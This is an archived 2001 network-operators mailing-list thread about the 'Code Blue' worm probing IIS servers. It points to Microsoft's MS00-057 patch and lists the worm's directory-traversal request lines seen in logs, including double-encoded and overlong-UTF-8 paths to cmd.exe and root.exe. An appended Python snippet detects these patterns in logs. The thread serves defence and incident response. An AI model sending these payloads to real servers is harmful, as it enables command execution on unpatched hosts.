North American Network Operators Group

FW: Re: Worm probes
|> -----Original Message-----
|> From: Jaco Engelbrecht [mailto:[email protected]]
|> Sent: Tuesday, September 18, 2001 9:01 AM
|> To: Roeland Meyer
|> Subject: Re: Worm probes
|>
|>
|> Hi,
|>
|> Sorry for emailing you directly, but I can't post to the nanog list.
|> It's `Code Blue` that's going around atm.
|>
|> Will bounce you a separate message now.
|>
|> Regards,
|> Jaco
|>
|> -----Original Message-----

Received: from serendipity.org.za ([196.14.22.14]) by condor.mhsc.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2650.21) id SBLN3KQ6; Tue, 18 Sep 2001 09:02:18 -0700
Received: from nobody by serendipity.org.za with scanned_ok (Exim 3.22 #6) id 15jNJQ-0003O1-00 for [email protected]; Tue, 18 Sep 2001 18:01:28 +0200
Received: from etna.serendipity.org.za ([196.14.22.132] helo=etna) by serendipity.org.za with smtp (Exim 3.22 #6) id 15jNJP-0003Ns-00 for [email protected]; Tue, 18 Sep 2001 18:01:27 +0200
Message-ID: <[email protected]>
From: "Jaco Engelbrecht" <[email protected]>
To: "Roeland Meyer" <[email protected]>
Subject: Fw: [[email protected]: Re: New worm going 'round?] (fwd)
Date: Tue, 18 Sep 2001 18:05:18 +0200
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 1
X-MSMail-Priority: High
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
X-Checked: This message has been scanned for any virusses and unauthorized attachments.
X-iScan: Version $Id: iScan,v 1.35 2001/03/04 20:15:54 rip Exp $

|> From: Jaco Engelbrecht [mailto:[email protected]]
|> Sent: Tuesday, September 18, 2001 9:05 AM
|> To: Roeland Meyer
|> Subject: Fw: [[email protected]: Re: New worm going 'round?] (fwd)
|> Importance: High
|>
|>
|> Hi Roland,
|>
|> `Code Blue` - see
|> http://www.securityfocus.com/frames/?content=/vdb/bottom.html%3Fsection%3Dexploit%26vid%3D1806
|>
|> And for the solution:
|> "The patch released with the advisory MS00-057
|> (http://www.microsoft.com/technet/security/bulletin/ms00-057.asp)
|> eliminates this vulnerability, therefore those who have already
|> applied this patch do not have to take any further action. Otherwise,
|> the patch is available at the following locations:
|>
|> IIS 4.0 http://www.microsoft.com/ntserver/nts/downloads/critical/q269862/default.asp
|> IIS 5.0 http://www.microsoft.com/windows2000/downloads/critical/q269862/default.asp"
|>
|> Regards,
|> Jaco
|>
|> --
|> [email protected]
|> the faculty of making fortunate discoveries
|>
|> ----- Forwarded message from The Flying Hamster <[email protected]> -----
|>
|> Date: Tue, 18 Sep 2001 15:36:20 +0100
|> From: The Flying Hamster <[email protected]>
|> To: [email protected]
|> Subject: Re: New worm going 'round?
|> Reply-To: [email protected]
|>
|> On Tue, Sep 18, 2001 at 10:31:59AM -0400, Gerald T. Freymann wrote:
|> > If I tail -f httpd-error.log these errors are going by faster than I can
|> > read! omg!
|>
|> Same here, the signature requests appear to be
|>
|> GET /MSADC/root.exe?/c+dir HTTP/1.0
|> GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
|> GET /_vti_bin/..%255c../..%25
|> GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
|> GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
|> GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
|> GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
|> GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
|> GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
|> GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
|> GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
|> GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
|> GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
|> GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
|> GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
|> GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
|> GET /scripts/root.exe?/c+dir HTTP/1.0
|>
|> It looks like each of these is tried against each IP being probed.
|>
|> --
|> The Flying Hamster <[email protected]>
|> http://hamster.wibble.org/
|> "Unarmed...and extremely attractive." -- Dana Scully on Windows 95
|> -
|> Recent archives of the list can be found at:
|> http://mix.twistedpair.ca/pipermail/inet-access/
|> Send 'unsubscribe' in the body to '[email protected]' to leave.
|> Eat sushi frequently. [email protected] is the human contact address.
|>
|> ----- End forwarded message -----
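
The probe list in the forwarded message mixes double percent-encoding (`%255c`, `%%35c`), overlong two-byte forms (`%c0%af`, `%c1%9c`) and plain requests for `cmd.exe` or `root.exe`. As an added example that is not part of the original thread, this Python code normalizes a logged request line and reports which of those traits it shows; the function names and reason labels are assumptions of this example.

```python
import re
from urllib.parse import unquote_to_bytes

# 0xC0/0xC1 never begin valid UTF-8; a lenient decoder folds such a pair to ASCII.
OVERLONG = re.compile(rb"[\xc0\xc1](.)", re.S)

def _fold(m):
    lead, trail = m.group(0)
    return bytes([((lead & 0x1F) << 6) | (trail & 0x3F)])

def normalize(path, max_rounds=5):
    """Percent-decode until the path stops changing; return (bytes, rounds)."""
    cur, rounds = path.encode(), 0
    while rounds < max_rounds:
        nxt = unquote_to_bytes(cur)
        if nxt == cur:
            break
        cur, rounds = nxt, rounds + 1
    return cur, rounds

def classify(request_line):
    """Return the reasons a logged request line resembles the listed probes."""
    parts = request_line.split()
    if len(parts) < 2:
        return []
    raw, rounds = normalize(parts[1].split("?", 1)[0])
    folded = OVERLONG.sub(_fold, raw)
    reasons = []
    if rounds > 1:                      # e.g. %255c -> %5c -> backslash
        reasons.append("multi-encoded")
    if folded != raw:                   # e.g. %c0%af folds to '/'
        reasons.append("overlong-utf8")
    if re.search(rb"\.\.[/\\]", folded):
        reasons.append("traversal")
    if re.search(rb"(cmd|root)\.exe$", folded.lower()):
        reasons.append("shell-binary")
    return reasons

# Constructed sample: four request lines from the list above plus two benign ones.
SAMPLE = [
    "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /MSADC/root.exe?/c+dir HTTP/1.0",
    "GET /index.html HTTP/1.0",
    "GET /docs/my%20file.html HTTP/1.0",
]

if __name__ == "__main__":
    for line in SAMPLE:
        print(classify(line) or "ok", line)
```

Decoding to a fixed point before matching is what lets a single traversal pattern cover every encoded variant in the list, instead of one signature per encoding.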